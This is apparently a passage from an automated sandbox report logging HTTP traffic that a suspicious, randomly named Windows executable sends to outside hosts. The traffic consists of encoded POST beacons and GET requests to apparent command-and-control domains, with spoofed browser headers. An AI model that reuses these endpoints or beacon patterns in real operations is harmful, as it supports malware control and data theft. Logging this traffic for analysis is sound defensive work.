                                                                                                                                      Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      26192.168.2.450034104.21.36.239804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:24.411268950 CET734OUTPOST /eln6/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.goldbracelet.top
                                                                                                                                      Referer: http://www.goldbracelet.top/eln6/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 76 31 30 56 41 32 61 30 48 52 33 4e 4a 38 66 54 50 56 6f 5a 77 32 49 56 78 35 4d 6b 46 76 39 56 50 41 34 76 4f 30 67 36 55 73 76 45 51 7a 65 53 48 67 76 73 69 42 55 78 76 52 37 48 76 4b 41 43 73 42 6e 47 48 4d 48 55 65 74 41 41 6b 79 72 4c 47 6e 56 78 68 31 70 37 56 71 32 6f 41 76 47 49 37 75 6c 61 46 50 68 55 64 48 77 52 62 65 34 65 68 6f 57 50 72 66 34 69 6d 54 48 32 68 6c 2b 4e 57 72 77 72 76 64 76 69 50 54 79 4b 30 7a 47 6d 67 64 4d 51 49 30 37 35 62 36 6f 42 66 4b 64 46 6c 6a 49 71 61 4c 5a 43 34 57 6b 69 45 34 73 79 61 4c 4a 67 2b 75 63 55 48 4f 58 52 56 35 55 65 4f 42 58 57 43 51 6a 63 4b 6d 67 3d
                                                                                                                                      Data Ascii: sTS=QTR40tOSZ0kPv10VA2a0HR3NJ8fTPVoZw2IVx5MkFv9VPA4vO0g6UsvEQzeSHgvsiBUxvR7HvKACsBnGHMHUetAAkyrLGnVxh1p7Vq2oAvGI7ulaFPhUdHwRbe4ehoWPrf4imTH2hl+NWrwrvdviPTyK0zGmgdMQI075b6oBfKdFljIqaLZC4WkiE4syaLJg+ucUHOXRV5UeOBXWCQjcKmg=
                                                                                                                                      Jan 11, 2025 09:38:24.892164946 CET981INHTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:24 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOlK6JPWivihzn1jbufvQePljqU0bfXC5wTFyAPQctq%2FhwYlx0EFFvji1%2BZHjGofLNz7QaF%2FRL6D6X5A6NuL5L%2BsYO9rDvtsG7WVpZTnw3xPwEK5rB6YUcBVs67riC3Ha1kiNBS2Sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 9003972518b70c88-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      27192.168.2.450035104.21.36.239804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:26.960139990 CET10816OUTPOST /eln6/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.goldbracelet.top
                                                                                                                                      Referer: http://www.goldbracelet.top/eln6/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 76 31 30 56 41 32 61 30 48 52 33 4e 4a 38 66 54 50 56 6f 5a 77 32 49 56 78 35 4d 6b 46 76 31 56 50 53 77 76 49 6e 49 36 58 73 76 45 4f 44 65 66 48 67 75 75 69 42 4d 39 76 52 33 35 76 49 34 43 76 67 48 47 50 64 48 55 45 39 41 41 73 53 72 57 62 58 55 72 68 31 5a 2f 56 71 6d 6f 41 76 47 49 37 72 68 61 43 62 31 55 61 33 77 53 63 65 34 43 33 59 58 53 72 62 64 64 6d 54 44 4d 68 78 4b 4e 57 4c 41 72 74 6f 37 69 58 44 79 4d 31 7a 47 2b 67 64 49 50 49 30 6e 50 62 36 4d 37 66 4e 74 46 6f 6d 5a 31 66 6f 34 5a 68 67 6b 65 66 61 38 49 61 59 30 6b 35 4f 38 39 42 66 37 4f 41 34 6f 6d 4e 77 69 64 48 31 72 6d 52 57 6c 44 6f 51 73 36 43 6c 43 69 6a 70 73 4c 34 49 44 51 54 45 37 65 33 59 54 33 37 71 2b 30 6d 37 47 4f 52 4c 54 6b 63 73 6f 59 64 2b 52 45 64 35 36 73 61 43 6e 53 51 59 70 52 73 5a 48 38 56 7a 53 79 4c 77 76 72 4d 79 78 64 67 71 56 68 6e 43 53 73 67 50 42 32 46 63 35 6d 35 73 54 70 66 48 47 72 39 34 47 7a 38 73 4b 43 6a 44 41 4f 59 35 46 67 69 2f 68 66 69 4b [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=QTR40tOSZ0kPv10VA2a0HR3NJ8fTPVoZw2IVx5MkFv1VPSwvInI6XsvEODefHguuiBM9vR35vI4CvgHGPdHUE9AAsSrWbXUrh1Z/VqmoAvGI7rhaCb1Ua3wSce4C3YXSrbddmTDMhxKNWLArto7iXDyM1zG+gdIPI0nPb6M7fNtFomZ1fo4Zhgkefa8IaY0k5O89Bf7OA4omNwidH1rmRWlDoQs6ClCijpsL4IDQTE7e3YT37q+0m7GORLTkcsoYd+REd56saCnSQYpRsZH8VzSyLwvrMyxdgqVhnCSsgPB2Fc5m5sTpfHGr94Gz8sKCjDAOY5Fgi/hfiKKNPkNrl4Z4nJpEG7Fq03+UPjdG/Q70KGd9yFkhyyeqLx9BFi92AiAnCT60kU3N69Y7kgHVnQu6YYfypYrGRFhZcTjlkJWmzzIbtQlKaIpmsk3R3TLWYkg+PZnPfAX1KhSSrB+xIJAe0+WDIoATiuAL6qYWNT6+7clcTIy9jKSBKnERdR1YETRX9E/S/B8NWtFF6f8HUHY5b8k4vcpbZQaL5uUY4aefGFFZPbEeJ8z7eIGaKgNIzJQGWZVZbfW3q3Zs4E4Fyusb2TYdp1pxXYTCAXKxWnfXMPZVN/1bUIFBZjsmOcd1akp1cIKFqPylLQaEi+BlhGP92CYaD4YulUGeXp5xXCNQcFght4UMEi6X1yJDFDibzt24MJClw+0l5kAFzeRqhwyLfRUmbZj69IYnlVSxtdpt6g2/KlZ68WD9r98mYONrdSN2XbVasI0rUJNdBDXykMmSlqom5W60yZ+rxwY2TChOpzu0bqmaq77DQoVAleUq7MHsiv5cMi0EzkuJwhci0gm9RkQtdLwjNCDVLcE3FSrVSCsiQ+j+8PXYlQv2dKOeRIVkIOEl/HCCdlNFuHdSXt2mNpouvwnJth5HSGaL/AvwTChsuzWdY3IsnZGbVDIEcDOy7Nbk7GZUt84/XrTm3UV4JDlZ4b6hhnvW+jbRG9lI2w6/ [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:38:27.454440117 CET981INHTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:27 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YVygnqjWPGPr9NBEGFCsdGiBT65M%2F2Nrc290OqWsEATzcVtEei0twVSkQwcuiC7q5KxGBM7Ka9pWl7jdW5cLSk7GqD7EB6CnKjZ%2FreEXOnosE0xAZHd5XknHUvHckjAhoJZKUKiMlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900397351e9c43b9-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2513&min_rtt=2513&rtt_var=1256&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10816&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      28192.168.2.450036104.21.36.239804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:29.501317978 CET443OUTGET /eln6/?sTS=dR5Y3aKNW3l55kUMNVrLYxm/K9ThMGgB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd/kFlGTTehU6/lxZCa6BP/PSovIsDoNSFVQ=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.goldbracelet.top
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:29.971736908 CET1236INHTTP/1.1 403 Forbidden
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:29 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4PI6f6bb8MkEFrNmwW4fj%2Bq7LIIkxnRAsHJYFg390iUJXN7HNwbgu5%2FCZWBlgFZOD5s5ce6uHy7fh68SMLKI%2FX9bTl6FAUhyPnVpHgYawPwYMih4StHzNGhZ6UxTcFhByA0Yd85dhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 90039744dc1343b1-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2497&min_rtt=2497&rtt_var=1248&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                                      Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chro
                                                                                                                                      Jan 11, 2025 09:38:29.971754074 CET102INData Raw: 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72
                                                                                                                                      Data Ascii: me friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      29192.168.2.450037208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:35.241518021 CET729OUTPOST /1y0g/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.regislemberthe.online
                                                                                                                                      Referer: http://www.regislemberthe.online/1y0g/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 6a 58 61 71 55 64 6e 6e 56 68 53 6b 51 66 79 30 69 4a 72 78 50 52 4c 52 4d 5a 36 4d 31 69 6e 52 75 2f 78 56 64 65 4e 4d 6e 5a 33 6f 34 53 47 74 79 6b 35 31 4b 6e 54 33 36 38 79 42 46 2b 59 75 65 7a 42 48 4a 66 77 53 59 49 4a 54 2f 4c 61 4d 62 65 6d 4c 62 67 6c 37 4a 4c 4f 49 2f 72 46 47 57 57 41 72 56 7a 6c 45 59 38 79 6b 74 4a 35 4b 78 65 71 52 52 50 6e 44 5a 75 73 78 53 65 5a 39 6a 7a 52 39 69 62 77 43 61 42 33 46 35 62 4d 5a 2f 6b 47 5a 64 63 36 63 35 6c 33 52 50 4c 55 33 31 37 66 65 35 37 77 63 6d 7a 46 73 52 37 33 4b 6d 32 43 39 77 67 3d 3d
                                                                                                                                      Data Ascii: sTS=FGGxLekk0opajXaqUdnnVhSkQfy0iJrxPRLRMZ6M1inRu/xVdeNMnZ3o4SGtyk51KnT368yBF+YuezBHJfwSYIJT/LaMbemLbgl7JLOI/rFGWWArVzlEY8yktJ5KxeqRRPnDZusxSeZ9jzR9ibwCaB3F5bMZ/kGZdc6c5l3RPLU317fe57wcmzFsR73Km2C9wg==


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      30192.168.2.450038208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:37.793903112 CET749OUTPOST /1y0g/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.regislemberthe.online
                                                                                                                                      Referer: http://www.regislemberthe.online/1y0g/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 69 7a 65 71 50 38 6e 6e 45 52 53 72 66 2f 79 30 33 35 72 71 50 52 33 52 4d 62 58 4a 31 78 54 52 75 66 42 56 63 66 4e 4d 72 35 33 6f 7a 79 47 6f 76 30 35 36 4b 6e 66 4a 36 38 2b 42 46 36 77 75 65 78 4a 48 4a 73 59 56 59 59 4a 52 79 72 61 4f 56 2b 6d 4c 62 67 6c 37 4a 4c 62 6e 2f 72 39 47 56 6d 77 72 55 57 4a 48 62 38 79 37 36 35 35 4b 6e 75 71 64 52 50 6e 31 5a 73 59 62 53 61 70 39 6a 79 42 39 37 71 77 4e 51 42 33 48 6b 72 4e 63 33 58 57 53 59 74 44 66 6d 57 62 6b 42 66 4d 54 39 64 53 45 6f 4b 52 4c 30 7a 68 66 4d 38 2b 2b 72 31 2f 30 72 76 62 62 58 65 4e 6d 47 59 4d 73 4b 49 45 6f 2f 62 64 4d 33 47 55 3d
                                                                                                                                      Data Ascii: sTS=FGGxLekk0opaizeqP8nnERSrf/y035rqPR3RMbXJ1xTRufBVcfNMr53ozyGov056KnfJ68+BF6wuexJHJsYVYYJRyraOV+mLbgl7JLbn/r9GVmwrUWJHb8y7655KnuqdRPn1ZsYbSap9jyB97qwNQB3HkrNc3XWSYtDfmWbkBfMT9dSEoKRL0zhfM8++r1/0rvbbXeNmGYMsKIEo/bdM3GU=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      31192.168.2.450039208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:40.348731041 CET10831OUTPOST /1y0g/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.regislemberthe.online
                                                                                                                                      Referer: http://www.regislemberthe.online/1y0g/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 69 7a 65 71 50 38 6e 6e 45 52 53 72 66 2f 79 30 33 35 72 71 50 52 33 52 4d 62 58 4a 31 78 4c 52 76 75 68 56 64 34 68 4d 6c 5a 33 6f 77 79 47 70 76 30 35 6a 4b 6b 76 7a 36 39 43 52 46 38 30 75 66 55 64 48 4c 64 59 56 57 59 4a 52 74 37 61 54 62 65 6e 54 62 67 31 33 4a 4c 4c 6e 2f 72 39 47 56 6b 34 72 51 44 6c 48 58 63 79 6b 74 4a 35 4f 78 65 71 78 52 50 66 4c 5a 73 4e 75 53 4c 56 39 6b 53 78 39 67 38 45 4e 53 68 33 42 6e 72 4e 36 33 58 62 4b 59 74 66 31 6d 58 75 2f 42 59 73 54 2f 61 57 59 31 71 4a 69 72 79 38 42 59 75 4f 2b 6c 6e 48 61 7a 2f 62 6c 58 4f 70 55 64 70 49 36 48 72 6c 6d 37 4c 4e 37 70 6a 57 30 6d 58 61 34 55 2b 62 4b 58 76 65 47 5a 65 78 36 75 4b 34 5a 32 38 4c 77 45 59 6f 56 4e 42 59 46 32 63 63 63 31 7a 6c 51 67 34 4f 31 5a 51 45 70 72 6c 50 59 79 61 67 35 59 55 72 4c 53 74 35 6d 2f 47 61 56 44 58 55 71 43 6e 6a 39 47 49 35 33 62 74 51 39 65 79 66 47 77 2b 6b 50 39 44 4b 4c 66 2f 62 7a 66 55 4f 56 38 41 77 55 45 47 42 4f 4a 35 51 4a 36 48 [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=FGGxLekk0opaizeqP8nnERSrf/y035rqPR3RMbXJ1xLRvuhVd4hMlZ3owyGpv05jKkvz69CRF80ufUdHLdYVWYJRt7aTbenTbg13JLLn/r9GVk4rQDlHXcyktJ5OxeqxRPfLZsNuSLV9kSx9g8ENSh3BnrN63XbKYtf1mXu/BYsT/aWY1qJiry8BYuO+lnHaz/blXOpUdpI6Hrlm7LN7pjW0mXa4U+bKXveGZex6uK4Z28LwEYoVNBYF2ccc1zlQg4O1ZQEprlPYyag5YUrLSt5m/GaVDXUqCnj9GI53btQ9eyfGw+kP9DKLf/bzfUOV8AwUEGBOJ5QJ6HpOLIC7K0+WzyGy2HFkIjvRBLegSXOB3sFUoH/P5VDRILeLSmmM125pCc5O4Fc08Zub22JS18JElxGdCcGhsAa1bwnQrKFdub6G+ypCluhd90S1iMVYqauL6fISxzHzO4W3VdqlEgeuItjUP9cYF7Z/helXmRIfBihf2BtIbHTphJk6v2oQIXiUrt7qac+2r/1qi74EVqRrmGRHlW2rzXm3xdasrhHs082ADL4DDXOidixK/FzzlP+hOkemHbENjQoSaJDQpzNVEbtx5Jh7uAz+y+TVr5HGAVNwchfqHZHpq2Q32YfJlan7vnogY0zhmWn29ryfqdl8P6/3GhUY6X2LcPW791870IpWnMli9W9ASIx7Vv9cQBmcUQirbZHYxzrnNzFGA+NI5P1ULjDIXnxoWR3ZWXAAhVItRzL7pVrAGl/8S9JDw+H4r48zBjuccdSSFwaLEHWO/Fh1UkQwuXQY+cci8KhRHX7Aq0gyvwYdOqYOJ5YxlkzBnvIkBUE7JWSYicl5B7D1Ku0SVJ1TRfhmxicL3nLipISw1Miys+s7UnfKPEOoXzUmWGOKklAHubebmNpA9d/+Uwc1ELin1eDYDSzgMAVfFUTQPqRjvtUn7MNjhxvXl2Y48Agg0FMveqm/ACHjK3Q2XYtqEIeB5XczA/16M1oh//Qg [TRUNCATED]


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      32192.168.2.450040208.91.197.27804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:42.890602112 CET448OUTGET /1y0g/?sTS=IEuRIrUs/61ernzXW8DdDQ7UXMybyf23DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNeeBm+a+pfpebFy1eZZqf08c6FVwESRpxQuE=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.regislemberthe.online
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:44.007908106 CET1236INHTTP/1.1 200 OK
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:42 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
